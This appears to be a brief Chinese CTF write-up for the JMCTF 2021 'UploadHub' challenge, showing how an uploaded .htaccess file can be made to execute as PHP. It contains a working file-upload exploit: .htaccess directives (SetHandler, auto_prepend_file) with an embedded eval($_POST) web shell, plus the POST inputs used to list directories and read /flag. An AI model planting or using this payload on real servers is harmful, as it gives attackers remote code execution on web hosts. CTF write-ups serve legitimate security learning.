[JMCTF 2021]UploadHub
题目
上传.htaccess就是修改配置文件
<FilesMatch .htaccess>
SetHandler application/x-httpd-php
Require all granted
php_flag engine on
</FilesMatch>
php_value auto_prepend_file .htaccess
#<?php eval($_POST['md']);?>
SetHandler和ForceType
强制所有匹配的文件被一个指定的处理器处理 用法:
ForceType application/x-httpd-php
SetHandler application/x-httpd-php那么这里就是将.htaccess文件解析为php
Require all granted #允许所有请求
php_flag engine on #开启PHP的解析
php_value auto_prepend_file .htaccess 在主文件解析之前自动解析包含.htaccess的内容
md=var_dump(scandir("/"));
md=var_dump(file_get_contents("/flag")); 执行命令绕过获取flag
拿下flag
flag{07793544-65b6-4613-be56-3574d880120f}
这样做似乎有点局限性就是隔一段时间就得重新上传.htaccess文件才能解析成功